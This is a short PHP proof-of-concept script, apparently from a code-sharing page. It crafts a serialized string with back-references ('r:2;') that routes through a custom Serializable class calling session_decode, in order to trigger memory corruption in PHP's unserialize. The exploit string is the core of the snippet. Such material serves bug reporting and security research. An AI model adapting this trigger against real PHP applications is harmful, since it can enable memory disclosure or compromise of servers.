<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); class obj implements Serializable { var $data; function serialize() { return serialize($this->data); } function unserialize($data) { session_decode($data); } } $inner = 'r:2;'; $exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;C:3:"obj":'.strlen($inner).':{'.$inner.'}}'; $data = unserialize($exploit); for ($i = 0; $i < 5; $i++) { $v[$i] = 'hi'.$i; } var_dump($data); var_dump($_SESSION);
You have javascript disabled. You will not be able to edit any code.